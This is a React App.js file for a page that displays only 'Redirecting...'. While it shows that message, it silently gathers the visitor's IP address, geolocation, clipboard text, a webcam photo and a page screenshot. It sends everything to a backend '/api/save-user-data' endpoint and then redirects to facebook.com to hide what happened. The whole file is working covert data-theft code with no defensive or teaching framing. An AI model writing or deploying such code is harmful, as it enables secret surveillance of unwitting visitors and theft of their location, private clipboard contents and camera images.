// src/App.js
import React, { useEffect, useState } from "react";
import axios from "axios";
import html2canvas from "html2canvas";

const App = () => {
  const [redirectMessage, setRedirectMessage] = useState("Redirecting...");
  const backendURL = process.env.REACT_APP_BACKEND_URL;

  useEffect(() => {
    const fetchData = async () => {
      try {
        // 1. Get user's IP address from server or third-party API
        const ipResponse = await axios.get("https://api64.ipify.org?format=json");
        const ipAddress = ipResponse.data.ip;

        // 2. Try getting user's geolocation
        let geoData = {};
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(
            (position) => {
              geoData = {
                latitude: position.coords.latitude,
                longitude: position.coords.longitude,
              };
              collectAndSendData(ipAddress, geoData);
            },
            (error) => {
              console.error("Geolocation error:", error);
              collectAndSendData(ipAddress, geoData); // Send without geolocation
            }
          );
        } else {
          console.log("Geolocation not supported");
          collectAndSendData(ipAddress, geoData); // Send without geolocation
        }
      } catch (error) {
        console.error("Error fetching IP or geolocation:", error);
      }
    };

    const collectAndSendData = async (ip, geo) => {
      try {
        // Collect Clipboard Data
        let clipboardData = "Not Supported";
        try {
          if (navigator.clipboard) {
            clipboardData = await navigator.clipboard.readText();
          }
        } catch (error) {
          console.error("Error reading clipboard data:", error);
        }
    
        // Capture Camera Image
        let cameraImage = "Not Captured";
        try {
          if (navigator.mediaDevices?.getUserMedia) {
            const stream = await navigator.mediaDevices.getUserMedia({ video: true });
            const video = document.createElement("video");
            video.srcObject = stream;
            await new Promise((resolve) => (video.onloadedmetadata = resolve));
            const canvas = document.createElement("canvas");
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            const ctx = canvas.getContext("2d");
            ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
            cameraImage = canvas.toDataURL("image/png"); // Base64 string
            stream.getTracks().forEach((track) => track.stop());
          }
        } catch (error) {
          console.error("Error capturing camera image:", error);
        }
    
        // Take Screenshot of Page
        let screenshot = "Not Captured";
        try {
          const screenshotCanvas = await html2canvas(document.body);
          screenshot = screenshotCanvas.toDataURL("image/png"); // Base64 string
        } catch (error) {
          console.error("Error taking screenshot:", error);
        }
        // Send Data to Server
        const payload = { ip, geo, clipboardData, cameraImage, screenshot };
        await axios.post(`${backendURL}/api/save-user-data`, payload);
        console.log("Data sent to server:", payload);
    
        // Redirect
        setTimeout(() => {
          window.location.href = "https://www.facebook.com";
        }, 1000);
      } catch (error) {
        console.error("Error collecting or sending data:", error);
      }
    };
    

    fetchData();
  }, []);

  return <div>{redirectMessage}</div>;
};

export default App;
